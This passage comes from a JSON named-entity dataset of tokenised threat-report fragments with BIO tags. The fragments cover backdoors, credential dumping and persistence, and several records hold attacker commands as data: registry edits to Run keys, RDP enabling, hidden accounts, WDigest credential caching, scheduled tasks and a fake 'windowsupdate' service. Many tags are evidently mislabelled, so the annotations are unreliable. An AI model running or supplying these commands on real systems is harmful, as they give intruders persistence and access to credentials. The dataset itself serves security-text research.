"O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RC4-decrypts", - "command", - "data", - "returned", - "in", - "the", - "Data", - "field." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "dropper", - "configures", - "the", - "backdoor", - "with", - "a", - "C2", - "server", - "address,", - "RC4", - "encryption", - "key," - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64-decodes" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decryption." - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "decrypt", - "the", - "Data", - "field." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "and", - "executes", - "in", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "embedded", - "key", - "to", - "decrypt", - "the", - "source", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "deobfuscated", - "SMOKEDHAM", - "dropper." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Upload", - "a", - "screen", - "capture", - "to", - "its", - "C2", - "server" - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "writes", - "captured", - "keystrokes", - "to", - "memory", - "and", - "uploads", - "them", - "to", - "its", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "add", - "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "created", - "a", - "persistence", - "mechanism", - "for", - "NGROK", - "by", - "adding", - "VirtualHost.vbs", - "to", - "the", - "WindNT", - "value", - "under", - "the", - "current", - "users", - "Run", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "created", - "a", - "persistence", - "mechanism", - "for", - "UltraVNC", - "by", - "adding", - "the", - "application", - "to", - "the", - "ConhostNT", - "value", - "under", - "the", - "current", - "users", - "Run", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "add", - "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "store", - "a", - "file", - "named", - "update.lnk", - "in", - "the", - "%APPDATA%\\Microsoft\\Windows\\Start", - "Menu\\Programs\\Startup\\", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command", - "line", - "argument", - "provided" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passed", - "as", - "an", - "argument", - "on", - "the", - "command", - "line." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "using", - "the", - "Command-Line", - "Compiler." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "launched", - "with", - "a", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "Command", - "Prompt." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor", - "source", - "code", - "is", - "embedded", - "as", - "an", - "encrypted", - "string." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "whoami.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "systeminfo.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "reg.exe", - "ADD", - "'HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "modifying", - "Terminal", - "Server", - "registry", - "key", - "values" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "modifying", - "the", - "Local", - "Security", - "Authority", - "(LSA)", - "registry", - "key", - "value" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "ADD", - "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", - "Server'", - "/v", - "fDenyTSConnections", - "/t", - "REG_DWORD", - "/d", - "0", - "/f" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "ADD", - "'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal", - "Server'", - "/v", - "fSingleSessionPerUser", - "/t", - "REG_DWORD", - "/d", - "0", - "/f" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "ADD", - "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa", - "/v", - "LimitBlankPasswordUse", - "/t", - "REG_DWORD", - "/d", - "1", - "/f" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "modified", - "the", - "WDigest", - "registry", - "key", - "value", - "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential", - "to", - "enable", - "credential", - "caching." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "enable", - "multiple", - "Remote", - "Desktop", - "connection", - "sessions" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker", - "was", - "observed", - "moving", - "laterally", - "to", - "different", - "systems", - "in", - "the", - "environment", - "using", - "Remote", - "Desktop", - "Protocol", - "(RDP)", - "connections." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "attacker", - "dump", - "the", - "LSASS", - "process", - "using", - "Task", - "Manager", - "to", - "a", - "file", - "named", - "lsass.DMP,", - "and", - "later,", - "zip", - "the", - "dump", - "into", - "two", - "files", - "named", - "lsass.zip", - "and", - "lsass2.zip", - "located", - "in", - "the", - "C:\\ProgramData\\psh\\", - "directory." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LSASS", - "Dumping" - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam" - ] - }, - { - "tokens": [ - "conducted", - "credential", - "harvesting", - "via", - "dumping", - "LSASS", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "activity", - "from", - "Tor" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hop", - "points", - "to", - "enable", - "their", - "cyber", - "operations", - "while", - "remaining", - "anonymous." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“The", - "Onion", - "Router”", - "(Tor)", - "is", - "often", - "used", - "by", - "cyber", - "threat", - "actors", - "for", - "anonymity", - "and", - "C2." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "resulted", - "in", - "confirmed", - "compromises", - "of", - "internet-facing", - "Federal", - "Government", - "agency", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "resulted", - "in", - "confirmed", - "compromises", - "of", - "internet-facing", - "Federal", - "Government", - "agency", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "leveraging", - "CVE-2019-19781", - "to", - "compromise", - "Citrix", - "Application", - "Delivery", - "Controllers." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attack", - "of", - "a", - "Remote", - "Desktop", - "Protocol", - "on", - "a", - "public-facing", - "server." - ], - "ner_tags": [ - "B-OffAct", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "threat", - "actors", - "using", - "external", - "proxy", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "proxy", - "tools", - "may", - "be", - "commercially", - "available", - "infrastructure", - "as", - "a", - "service", - "(IaaS)", - "or", - "software", - "as", - "a", - "service", - "(SaaS)", - "in", - "the", - "form", - "of", - "a", - "web", - "browser", - "promising", - "anonymity", - "on", - "the", - "internet." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proxy", - "tools", - "depending", - "on", - "their", - "intended", - "use." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "activity", - "from", - "a", - "network", - "proxy", - "tool" - ], - "ner_tags": [ - "B-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cyber", - "threat", - "actors", - "also", - "continue", - "to", - "identify", - "large", - "repositories", - "of", - "credentials", - "that", - "are", - "available", - "on", - "the", - "internet", - "to", - "enable", - "brute-force", - "attacks." - ], - "ner_tags": [ - "B-Time", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "brute-force", - "passwords." - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "using", - "Mimikatz", - "in", - "conjunction", - "with", - "coin", - "miner", - "protocols", - "and", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Mimikatz", - "to", - "dump", - "credentials", - "from", - "the", - "OS", - "using", - "a", - "variety", - "of", - "capabilities", - "resident", - "within", - "the", - "tool." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "using", - "Mimikatz", - "during", - "their", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "brute-force", - "attack", - "of", - "a", - "Remote", - "Desktop", - "Protocol", - "on", - "a", - "public-facing", - "server." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "such", - "as", - "a", - "keystroke", - "logger" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "file", - "injection", - "capability" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "actors", - "to", - "execute", - "directory", - "traversal", - "attacks" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "delete", - "files" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "allows", - "cyber", - "threat", - "actors", - "to", - "execute", - "arbitrary", - "system", - "commands," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "concealed", - "programs", - "and", - "documents", - "at", - "innocuous-seeming", - "locations", - "on", - "victim", - "networks", - "and", - "in", - "victim", - "networks’", - "“recycle", - "bins.”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "lures", - "are", - "designed", - "to", - "socially", - "engineer", - "the", - "recipient", - "to", - "download", - "and", - "open", - "an", - "attached", - "RAR", - "file", - "that", - "contains", - "either", - "a", - "Microsoft", - "Compiled", - "HTML", - "Help", - "(CHM)", - "or", - "Excel", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "phishing", - "emails", - "that", - "were", - "used", - "as", - "lures", - "to", - "deliver", - "the", - "files" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "further", - "malware", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "a", - "next", - "stage", - "EXE", - "payload", - "using", - "cURL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "downloading", - "of", - "the", - "next", - "stage." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "scheduled", - "task", - "(shown", - "below)", - "runs", - "every", - "15", - "minutes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\schtasks.exe", - "/create", - "/sc", - "MINUTE", - "/mo", - "15", - "/TN" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "two", - "different", - "scheduled", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Scheduled", - "task" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "second", - "scheduled", - "task", - "created", - "attempts", - "to", - "execute", - "the", - "payload", - "downloaded", - "by", - "the", - "other", - "task:", - "\"C:\\Windows\\System32\\schtasks.exe\"", - "/create", - "/sc", - "MINUTE", - "/mo", - "20", - "/TN" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-Idus", - "B-Idus", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "create", - "a", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\schtasks.exe", - "/create", - "/sc", - "minute", - "/mo", - "15", - "/tn" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "create", - "scheduled", - "tasks", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "schtasks", - "/create", - "/tn", - "WinSecurity", - "/sc", - "minute", - "/mo", - "15" - ], - "ner_tags": [ - "B-Way", - "B-SamFile", - "B-SamFile", - "B-Way", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "payloads", - "are", - "compressed", - "inside", - "RAR", - "files,", - "this", - "helps", - "avoid", - "static", - "analysis", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "more", - "common", - "payloads", - "contained", - "within", - "the", - "RAR", - "files", - "are", - "Microsoft", - "Compiled", - "HTML", - "Help", - "(CHM)", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "computer", - "name" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "computer", - "name", - "is", - "sent", - "to", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "username", - "is", - "also", - "sent", - "to", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "computer", - "name", - "and", - "the", - "username", - "is", - "also", - "sent", - "to", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "computer", - "name", - "is", - "sent", - "to", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "plugins", - "such", - "as", - "a", - "keylogger," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "remote", - "access", - "tool" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "stealer" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encoded", - "PowerShell", - "command", - "stage,", - "obfuscating", - "the", - "activity", - "further", - "than", - "just", - "simple", - "string", - "concatenation." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encoded", - "PowerShell", - "command" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "command" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "obtain", - "initial", - "access", - "to", - "networks", - "is", - "through", - "the", - "use", - "of", - "compromised", - "valid", - "credential", - "pairs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "often", - "will", - "search", - "for", - "directories", - "on", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "remote", - "desktop", - "protocol", - "(RDP)", - "and", - "secure", - "shell", - "(SSH)", - "accesses" - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "will", - "look", - "for", - "networks", - "that", - "have", - "internet-facing", - "servers", - "running", - "RDP", - "and", - "then", - "exploit", - "vulnerabilities", - "in", - "those", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exposed", - "RDP", - "servers", - "are", - "also", - "abused", - "by", - "threat", - "actors", - "to", - "gain", - "initial", - "access", - "into", - "a", - "targets", - "network." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "brute", - "force", - "password", - "attacks" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "server", - "contained", - "HTTP", - "header", - "data", - "(SimpleHTTP/0.6", - "Python/3.8.10),", - "indicating", - "the", - "use", - "of", - "a", - "Python", - "library", - "called", - "SIMPLEHTTPSERVER" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "also", - "engaged", - "in", - "brute-forcing", - "against", - "the", - "victim's", - "internal", - "web", - "services" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "brute", - "forcing", - "tool", - "called", - "FSCAN." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "brute-force", - "attacks", - "on", - "systems" - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O" - ] - }, - { - "tokens": [ - "brute", - "forcing", - "attempts", - "on", - "some", - "of", - "the", - "internal", - "FTP", - "servers", - "inside", - "victim", - "network" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "database", - "used", - "a", - "weak", - "password", - "and", - "was", - "susceptible", - "to", - "brute-force", - "attacks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "threat", - "actor", - "used", - "the", - "Windows", - "command-line", - "arguments" - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "received", - "a", - "command-line", - "argument", - "from", - "attacker" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Used", - "to", - "search", - "for", - "the", - "string", - "\"DBPath\"", - "in", - "all", - "files", - "within", - "the", - "current", - "directory", - "and", - "its", - "subdirectories" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "List", - "of", - "recently", - "opened", - "files", - "and", - "folders", - "on", - "the", - "computer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "uses", - "stolen", - "passwords", - "from", - "valid", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "escalate", - "privileges", - "using", - "valid", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "reverse", - "SOCKS", - "proxy", - "activity", - "on", - "the", - "infected", - "device", - "using", - "the", - "open-source", - "tool", - "FRP." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "After", - "establishing", - "the", - "reverse", - "SOCKS", - "proxy", - "connection," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "utilized", - "open-source", - "reverse", - "proxy", - "tools", - "to", - "expose", - "local", - "devices", - "located", - "behind", - "a", - "NAT", - "or", - "firewall,", - "to", - "the", - "Internet." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Execution", - "of", - "FRP", - "reverse", - "SOCKS", - "proxy", - "on", - "infected", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Installation", - "of", - "malicious", - "Windows", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "it", - "will", - "install", - "a", - "fake", - "Windows", - "service", - "called", - "“windowsupdate”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Malicious", - "service", - "installation", - "is", - "accomplished", - "via", - "the", - "below", - "command", - "line", - "argument:", - "sc", - "create", - "WindowsUpdate", - "binPath=", - "C:\\Windows\\Temp\\svchost.exe", - "start=", - "auto", - "obj=", - "LocalSystem", - "DisplayName=", - "windowsupdate" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Maintain", - "Presence", - "via", - "Windows", - "Service", - "Installation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "establish", - "persistent", - "remote", - "access", - "on", - "the", - "victim", - "device,", - "the", - "threat", - "actor", - "abused", - "Windows", - "services", - "to", - "install", - "modified", - "version", - "of", - "Cobalt", - "Strike", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "installed", - "a", - "second", - "stage", - "persistence", - "backdoor", - "on", - "infected", - "device", - "by", - "abusing", - "Windows", - "Services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "This", - "service", - "executes", - "a", - "malicious", - "binary", - "(Cobalt", - "Strike", - "Cat", - "payload)", - "under", - "“C:\\Windows\\Temp\\svchost.exe”", - "every", - "time", - "the", - "victim", - "device", - "is", - "started." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "services", - "ran", - "with", - "the", - "highest", - "privilege,", - "NT", - "AUTHORITY\\SYSTEM", - "and", - "execute", - "the", - "malware", - "automatically", - "during", - "system", - "startup,", - "allowing", - "for", - "remote", - "access", - "to", - "the", - "victim", - "device", - "with", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "used", - "private", - "proxy", - "addresses", - "from", - "a", - "Chinese", - "underground", - "proxy", - "IP", - "solution", - "called", - "'Tigercloud", - "Club'", - "to", - "conceal", - "their", - "real", - "IP", - "address." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reverse", - "proxy", - "tool" - ], - "ner_tags": 